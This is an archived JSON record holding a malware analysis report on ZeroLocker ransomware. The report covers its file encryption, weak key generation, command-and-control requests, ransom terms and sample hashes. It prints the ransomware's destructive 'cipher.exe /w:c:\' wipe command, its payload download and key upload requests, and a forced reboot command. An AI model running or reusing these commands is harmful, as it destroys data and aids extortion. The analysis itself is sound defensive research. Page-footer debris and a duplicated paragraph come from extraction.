{
	"id": "4d122d22-94a3-4ab3-80af-889d335aa29a",
	"created_at": "2026-04-06T00:11:02.289654Z",
	"updated_at": "2026-04-10T03:20:16.408043Z",
	"deleted_at": null,
	"sha1_hash": "2a5a24abff0b10505b8173988f05e80cb8da8f0f",
	"title": "Introduction to the ZeroLocker ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 879200,
	"plain_text": "Introduction to the ZeroLocker ransomware\r\nBy Kimberly\r\nArchived: 2026-04-05 20:30:11 UTC\r\nA new ransomware called ZeroLocker has surfaced. The files are encrypted with AES (*) encryption.\r\nCurrently the threat is considered as the most destructive ransomware we have seen to date.\r\nZeroLocker does not only target data files; it encrypts ALL files on the hard drive, including executables, with\r\nAES encryption unless they are located in certain folders or larger than 20 MegaBytes.\r\nThe folders exempt from encryption are the ones containing the following keywords: Windows, WINDOWS,\r\nProgram Files, ZeroLocker and Desktop. Encrypted files will have .encrypted appended to their filename.\r\nZeroLocker performs several outbound connections to 5.199.171.47, a VPs located in Skri Lanka.\r\nWhen the threat has finished encrypting the files, it will run the C:\\WINDOWS\\SYSTEM32\\CIPHER.EXE /W:C:\\\r\ncommand in order to overwrite all deleted data on the hard drive. Doing so makes it impossible to use recovery\r\ntools to restore files.\r\nThe main issue with ZeroLocker resides in the fact that when it uploads the decryption key to the server, the C2\r\nreturns a 404 not found because the requested page doesn’t exist on the server.\r\nTherefore the key isn’t stored in any database or file for later recovery. The only way to recover the key would be\r\nto manually filter through the HTTP access logs if they still exist.\r\nThis coding mistake on behalf of the developer essentially renders the encrypted computer completely useless as\r\nthe victim is unable to retrieve the decryption key even after paying the ransom.\r\nZeroLocker is considered as very destructive especially for companies that have custom software installed under\r\nnormal paths.\r\nCurrently the infection doesn’t delete the Windows System Restore points so files can be restored using a program\r\nlike Shadow Explorer or Windows built-in Previous Version. This could change at any stage of course.\r\nPayment is only accepted in Bitcoins. The initial ransom is $300, after 5 days the price will increase to $600 and\r\nafter 10 days the victim will have to pay $1000.\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 1 of 10\n\nSource: Bleeping Computer\r\nThe first instance of ZeroLocker was discovered on a French forum assisting people with malware removal on\r\nAugust 8, 2014.\r\nZeroLocker\r\nOverview of functions.\r\nThe author didn't use AES encryption but used the RijndaelManaged class from the .NET Framework.\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 2 of 10\n\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 3 of 10\n\nThe random number generator is seeded Envionment.TickCount, a 32-bit signed integer containing the amount\r\nof time in milliseconds that has passed since the last time the computer was started. The strength of the password\r\nis less than 32-bit.\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 4 of 10\n\nUpon execution the threat will:\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 5 of 10\n\n1. Create a folder called C:\\ZeroLocker\r\n2. Perform the following outbound connection and save the binary as C:\\ZeroLocker\\ZERORESCUE.EXE\r\nGET /patriote/sansviolence\r\n3. A corresponding registry entry is created so that ZERORESCUE.EXE runs each time the computer starts.\r\n4. Retrieve the Bitcoin address used to pay the ransom and save it as C:\\ZeroLocker\\ADDRESS.DAT\r\nGET /zConfig/171386\r\n1CkwfDadjXPhp3XrUU5J8hQhUtbecH7t1N\r\n5. Upload the decryption key to the server. The request returns a 404.\r\nGET /zImprimer/[ID based upon MAC-ADDRESS]-[PASSWORD]-[BITCOIN ADDRESS]\r\n6. Encrypt the files on the hard drive. For each encrypted file the original file is deleted.\r\n7. Perform the following outbound connection and save the response as C:\\ZeroLocker\\LOG.DAT\r\nGET /enc/1\r\n8. Launch an instance of C:\\WINDOWS\\SYSTEM32\\CIPHER.EXE with the following command line\r\nparameters:\r\ncipher.exe\" /w:c:\\\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 6 of 10\n\n9. Reboot the compromised computer using the following command:\r\nc:\\windows\\system32\\shutdown.exe\" /r /t 0 /f\r\n10. Upon reboot the ransomware notice is displayed via C:\\ZeroLocker\\ZERORESCUE.EXE. Clicking the\r\n\"Decrypt Files\" button opens an internet connection with the VPS. Unfortunately the request returns a 404\r\nrendering decryption impossible even after paying the ransom. A message informs the victim that the\r\npayment hasn’t been received or processed yet and to try again later as it takes up to 24h to activate the\r\nkey.\r\nGET /[ID based upon MAC-ADDRESS]/key\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 7 of 10\n\nGlobal overview.\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 8 of 10\n\nID based upon MAC-ADDRESS.\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 9 of 10\n\nSamples Analysed\r\nAt the time of the analysis on August 18, 2014 we were aware of the following MD5 hashes:\r\nbd0a3c308a6d3372817a474b7c653097: TimeDateStamp: Tue Aug 05 14:27:06 2014\r\n3772a3deeb781803a907ed36ee10681d: TimeDateStamp: Wed Aug 06 11:01:48 2014\r\nBoth samples contain the following compile leftovers:\r\nc:\\users\\george\\desktop\\projects\\zerolocker\\testing stuff\\testing stuff\\obj\\debug\\task manager.pdb\r\nThe actor behind ZeroLocker is also associated with several Bitcoin Miners.\r\nIf our research has helped you, please consider making a donation through PayPal.\r\nSource: http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 10 of 10\n\n  http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html    \nThe random number generator is seeded Envionment.TickCount,  a 32-bit signed integer containing the amount\nof time in milliseconds that has passed since the last time the computer was started. The strength of the password\nis less than 32-bit.      \n   Page 4 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html"
	],
	"report_names": [
		"introduction-to-the-zerolocker-ransomware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434262,
	"ts_updated_at": 1775791216,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2a5a24abff0b10505b8173988f05e80cb8da8f0f.pdf",
		"text": "https://archive.orkl.eu/2a5a24abff0b10505b8173988f05e80cb8da8f0f.txt",
		"img": "https://archive.orkl.eu/2a5a24abff0b10505b8173988f05e80cb8da8f0f.jpg"
	}
}